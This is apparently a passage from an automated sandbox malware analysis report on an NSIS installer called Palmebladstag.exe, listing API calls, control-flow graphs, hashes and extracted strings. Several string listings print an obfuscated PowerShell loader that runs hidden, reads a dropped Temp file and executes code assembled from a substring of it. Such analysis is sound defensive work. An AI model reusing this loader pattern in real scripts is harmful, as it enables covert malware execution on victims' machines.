                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                            • String ID: "$"C:\Users\user\Desktop\Palmebladstag.exe"$-windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\humles\kvarterslag$C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145$C:\Users\user\Desktop$C:\Users\user\Desktop\Palmebladstag.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                            • API String ID: 2762237255-1516809388
                                            • Opcode ID: 5ef453458b89e108853d9eb8d1ddf04984d3abee564aa776787e6dcf25e1da77
                                            • Instruction ID: 3931d960d2cecc16523f178db0b803f8d2f925e5e1ab1ff86deffc182e7e2b76
                                            • Opcode Fuzzy Hash: 5ef453458b89e108853d9eb8d1ddf04984d3abee564aa776787e6dcf25e1da77
                                            • Instruction Fuzzy Hash: 01B10A709083816EE7116F755C4DA2B7EE8EB86306F04457EF181B62E2C77C9A05CB6E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 111 404fc2-404fdd 112 404fe3-4050ac GetDlgItem * 3 call 403ebc call 404722 GetClientRect GetSystemMetrics SendMessageA * 2 111->112 113 40516e-405175 111->113 133 4050ca-4050cd 112->133 134 4050ae-4050c8 SendMessageA * 2 112->134 115 405177-405199 GetDlgItem CreateThread FindCloseChangeNotification 113->115 116 40519f-4051ac 113->116 115->116 118 4051ca-4051d1 116->118 119 4051ae-4051b4 116->119 123 4051d3-4051d9 118->123 124 405228-40522c 118->124 121 4051b6-4051c5 ShowWindow * 2 call 403ebc 119->121 122 4051ec-4051f5 call 403eee 119->122 121->118 137 4051fa-4051fe 122->137 128 405201-405211 ShowWindow 123->128 129 4051db-4051e7 call 403e60 123->129 124->122 126 40522e-405231 124->126 126->122 135 405233-405246 SendMessageA 126->135 131 405221-405223 call 403e60 128->131 132 405213-40521c call 404e84 128->132 129->122 131->124 132->131 140 4050dd-4050f4 call 403e87 133->140 141 4050cf-4050db SendMessageA 133->141 134->133 142 405340-405342 135->142 143 40524c-40526d CreatePopupMenu call 405b99 AppendMenuA 135->143 150 4050f6-40510a ShowWindow 140->150 151 40512a-40514b GetDlgItem SendMessageA 140->151 141->140 142->137 148 405282-405288 143->148 149 40526f-405280 GetWindowRect 143->149 153 40528b-4052a3 TrackPopupMenu 148->153 149->153 154 405119 150->154 155 40510c-405117 ShowWindow 150->155 151->142 152 405151-405169 SendMessageA * 2 151->152 152->142 153->142 156 4052a9-4052c0 153->156 157 40511f-405125 call 403ebc 154->157 155->157 158 4052c5-4052e0 SendMessageA 156->158 157->151 158->158 160 4052e2-405302 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 158->160 161 405304-405324 SendMessageA 160->161 161->161 162 405326-40533a GlobalUnlock SetClipboardData CloseClipboard 161->162 162->142
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 00405021
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                            • GetClientRect.USER32(?,?), ref: 0040506D
                                            • GetSystemMetrics.USER32(00000015), ref: 00405075
                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                            • ShowWindow.USER32(?,00000008), ref: 00405111
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                              • Part of subcall function 00403EBC: SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405199
                                            • ShowWindow.USER32(00000000), ref: 004051BD
                                            • ShowWindow.USER32(0001040E,00000008), ref: 004051C2
                                            • ShowWindow.USER32(00000008), ref: 00405209
                                            • SendMessageA.USER32(0001040E,00001004,00000000,00000000), ref: 0040523B
                                            • CreatePopupMenu.USER32 ref: 0040524C
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                            • GetWindowRect.USER32(0001040E,?), ref: 00405274
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                            • OpenClipboard.USER32(00000000), ref: 004052E3
                                            • EmptyClipboard.USER32 ref: 004052E9
                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                            • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405329
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405334
                                            • CloseClipboard.USER32 ref: 0040533A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                            • String ID: Brandbltets Setup: Completed${
                                            • API String ID: 4154960007-1531065422
                                            • Opcode ID: 59144bb03668c6a22456da0cae4beda6d00f461010ddd3038afad2b30f9493db
                                            • Instruction ID: 5cc5a493c7826af022734a05619d12b61540e90d3b7798cd1ee4812e4cb533c1
                                            • Opcode Fuzzy Hash: 59144bb03668c6a22456da0cae4beda6d00f461010ddd3038afad2b30f9493db
                                            • Instruction Fuzzy Hash: FDA16C70900208BFEB119F60DC85AAE7F79FB44355F00816AFA05BA1A1C7795E41DFA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 404 405b99-405ba4 405 405ba6-405bb5 404->405 406 405bb7-405bcc 404->406 405->406 407 405bd2-405bdd 406->407 408 405dbf-405dc3 406->408 407->408 409 405be3-405bea 407->409 410 405dc9-405dd3 408->410 411 405bef-405bf9 408->411 409->408 413 405dd5-405dd9 call 405b77 410->413 414 405dde-405ddf 410->414 411->410 412 405bff-405c06 411->412 415 405db2 412->415 416 405c0c-405c41 412->416 413->414 418 405db4-405dba 415->418 419 405dbc-405dbe 415->419 420 405c47-405c52 GetVersion 416->420 421 405d5c-405d5f 416->421 418->408 419->408 422 405c54-405c58 420->422 423 405c6c 420->423 424 405d61-405d64 421->424 425 405d8f-405d92 421->425 422->423 428 405c5a-405c5e 422->428 431 405c73-405c7a 423->431 429 405d74-405d80 call 405b77 424->429 430 405d66-405d72 call 405ad5 424->430 426 405da0-405db0 lstrlenA 425->426 427 405d94-405d9b call 405b99 425->427 426->408 427->426 428->423 433 405c60-405c64 428->433 440 405d85-405d8b 429->440 430->440 435 405c7c-405c7e 431->435 436 405c7f-405c81 431->436 433->423 441 405c66-405c6a 433->441 435->436 438 405c83-405c9e call 405a5e 436->438 439 405cba-405cbd 436->439 447 405ca3-405ca6 438->447 445 405ccd-405cd0 439->445 446 405cbf-405ccb GetSystemDirectoryA 439->446 440->426 444 405d8d 440->444 441->431 448 405d54-405d5a call 405de2 444->448 450 405cd2-405ce0 GetWindowsDirectoryA 445->450 451 405d3a-405d3c 445->451 449 405d3e-405d41 446->449 452 405d43-405d47 447->452 453 405cac-405cb5 call 405b99 447->453 448->426 449->448 449->452 450->451 451->449 454 405ce2-405cec 451->454 452->448 457 405d49-405d4f lstrcatA 452->457 453->449 459 405d06-405d1c SHGetSpecialFolderLocation 454->459 460 405cee-405cf1 454->460 457->448 461 405d37 459->461 462 405d1e-405d35 SHGetPathFromIDListA CoTaskMemFree 459->462 460->459 464 405cf3-405cfa 460->464 461->451 462->449 462->461 465 405d02-405d04 464->465 465->449 465->459
                                            APIs
                                            • GetVersion.KERNEL32(?,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,00404EBC,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000), ref: 00405C4A
                                            • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405CC5
                                            • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405CD8
                                            • SHGetSpecialFolderLocation.SHELL32(?,0078DCE3), ref: 00405D14
                                            • SHGetPathFromIDListA.SHELL32(0078DCE3,Remove folder: ), ref: 00405D22
                                            • CoTaskMemFree.OLE32(0078DCE3), ref: 00405D2D
                                            • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D4F
                                            • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,00404EBC,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000), ref: 00405DA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-2714908849
                                            • Opcode ID: 9284a3d80ad1c6d902f3f6029a47a2c484411a272edc2098f61408b2e691f43e
                                            • Instruction ID: 050506686e60d08a76f5c318217997e75ce046d50ca6fca7f220fc6f31a13d77
                                            • Opcode Fuzzy Hash: 9284a3d80ad1c6d902f3f6029a47a2c484411a272edc2098f61408b2e691f43e
                                            • Instruction Fuzzy Hash: 5E61F471A04A05AAEF115F24CC88BBF3BA9EF52314F14813BE941BA2D1D27C5981DF5E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 466 405454-40547a call 405712 469 405493-40549a 466->469 470 40547c-40548e DeleteFileA 466->470 472 40549c-40549e 469->472 473 4054ad-4054bd call 405b77 469->473 471 40561d-405621 470->471 475 4054a4-4054a7 472->475 476 4055cb-4055d0 472->476 479 4054cc-4054cd call 40566b 473->479 480 4054bf-4054ca lstrcatA 473->480 475->473 475->476 476->471 478 4055d2-4055d5 476->478 481 4055d7-4055dd 478->481 482 4055df-4055e7 call 405e7b 478->482 483 4054d2-4054d5 479->483 480->483 481->471 482->471 490 4055e9-4055fd call 405624 call 40540c 482->490 486 4054e0-4054e6 lstrcatA 483->486 487 4054d7-4054de 483->487 489 4054eb-405509 lstrlenA FindFirstFileA 486->489 487->486 487->489 492 4055c1-4055c5 489->492 493 40550f-405526 call 40564f 489->493 502 405615-405618 call 404e84 490->502 503 4055ff-405602 490->503 492->476 495 4055c7 492->495 500 405531-405534 493->500 501 405528-40552c 493->501 495->476 505 405536-40553b 500->505 506 405547-405555 call 405b77 500->506 501->500 504 40552e 501->504 502->471 503->481 510 405604-405613 call 404e84 call 405a2b 503->510 504->500 507 4055a0-4055b2 FindNextFileA 505->507 508 40553d-40553f 505->508 516 405557-40555f 506->516 517 40556c-405577 call 40540c 506->517 507->493 514 4055b8-4055bb FindClose 507->514 508->506 512 405541-405545 508->512 510->471 512->506 512->507 514->492 516->507 519 405561-40556a call 405454 516->519 526 405598-40559b call 404e84 517->526 527 405579-40557c 517->527 519->507 526->507 529 405590-405596 527->529 530 40557e-40558e call 404e84 call 405a2b 527->530 529->507 530->507
                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 0040547D
                                            • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054C5
                                            • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054E6
                                            • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054EC
                                            • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004054FD
                                            • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AA
                                            • FindClose.KERNEL32(00000000), ref: 004055BB
                                            Strings
                                            • \*.*, xrefs: 004054BF
                                            • "C:\Users\user\Desktop\Palmebladstag.exe", xrefs: 00405454
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405462
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Palmebladstag.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-3455771638
                                            • Opcode ID: 89d564276d21df7661da435421169356815d2a04cf7613a329bdc21fa236ed0b
                                            • Instruction ID: 6c887a6cd9596c43cc691a5f5e4ea67afdeb508a4c755cd09b57e0a75bcacbf5
                                            • Opcode Fuzzy Hash: 89d564276d21df7661da435421169356815d2a04cf7613a329bdc21fa236ed0b
                                            • Instruction Fuzzy Hash: 6F51C030800A04BACB21AB21CC45BBF7AB9DF42318F54817BF455B11D2D73C9A82DEAD
                                            APIs
                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\Documents\resiniferous.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145$C:\Users\user\Documents\resiniferous.lnk
                                            • API String ID: 123533781-4092494930
                                            • Opcode ID: e43d08bdfe18f5b81f7297a9daeda15c11bc728faf919c2b3b39a678873141f0
                                            • Instruction ID: b07af7920b8309ffd935e8952b71055f016d565fd75ec3e93ef818f940943bf4
                                            • Opcode Fuzzy Hash: e43d08bdfe18f5b81f7297a9daeda15c11bc728faf919c2b3b39a678873141f0
                                            • Instruction Fuzzy Hash: 91415F75A00205AFCB00DFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB55
                                            APIs
                                            • FindFirstFileA.KERNELBASE(?,007A0548,C:\,00405755,C:\,C:\,00000000,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410), ref: 00405E86
                                            • FindClose.KERNEL32(00000000), ref: 00405E92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: C:\
                                            • API String ID: 2295610775-3404278061
                                            • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                            • Instruction ID: e3a419463b19944544fc21c9ad6669fb55d517ae4bfd2eba5619c06405e9773a
                                            • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                            • Instruction Fuzzy Hash: 6AD012319195205BC3406738AC0C89F7B69DB563317304B32B5BDF12E0C2389D628AE9
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                            • LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: AddressHandleLibraryLoadModuleProc
                                            • String ID:
                                            • API String ID: 310444273-0
                                            • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                            • Instruction ID: 2f3dee603afa82187d4e64c95529cacee06f2ec99598d25ed76f38a586475c1c
                                            • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                            • Instruction Fuzzy Hash: FBE08C32A04610ABC6209B209D0896B77ACEB88B41300497EF945F6151D734AC119BBA
                                            APIs
                                            • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040265E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
